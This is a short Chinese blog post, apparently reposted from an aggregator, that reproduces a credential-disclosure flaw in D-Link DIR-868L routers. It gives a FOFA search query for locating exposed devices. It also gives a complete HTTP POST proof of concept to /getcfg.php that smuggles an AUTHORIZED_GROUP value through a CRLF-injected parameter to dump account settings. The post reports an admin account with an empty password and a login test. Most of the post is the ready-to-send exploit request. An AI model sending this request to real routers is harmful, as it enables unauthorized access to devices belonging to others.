漏洞复现-某路由器账号密码泄露

Posted 蓝银花

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞复现-某路由器账号密码泄露相关的知识,希望对你有一定的参考价值。

漏洞简介:

D-Link 成立于 1986 年,创立至今三十年,凭借其完整多元的产品线以及优异且屡获国际奖项肯定的网络产品和服务,友讯科技已然成为年营收总值超过十亿美元的国际知名企业。 D-Link 在快速、竞争和不断发展的环境中,将持续提供高效能的网络解决方案协助消费者及各类型企业用户。近期网上爆出D-Link-Dir设备存在账号密码泄露漏洞!

 

FOFA语句:

app="D_Link-DIR-868L"

 

漏洞POC:

 1 POST /getcfg.php HTTP/1.1
 2 Host: xxxxxxxx
 3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
 4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 6 Connection: close
 7 Cookie: uid=XFOB50sMqS
 8 Upgrade-Insecure-Requests: 1
 9 Content-Type:application/x-www-form-urlencoded
10 Content-Length: 61
11 
12 SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1

 

修改数据包测试,用户Admin,密码空的

 

 

登录测试,(⊙o⊙)…,看不懂的语言

 

以上是关于漏洞复现-某路由器账号密码泄露的主要内容,如果未能解决你的问题,请参考以下文章

泛微e-cology OA系统某接口存在数据库配置信息泄露漏洞复现

漏洞复现局域网 ARP 中间人攻击 获取他人账号密码

资讯14亿用户账号密码被泄露,银行支付宝比特币全中枪;WordPress 储存型 XSS 漏洞

PhpStudy后门漏洞实战复现

161端口SNMP敏感信息泄露漏洞

某平台后台系统存在任意账号密码重置漏洞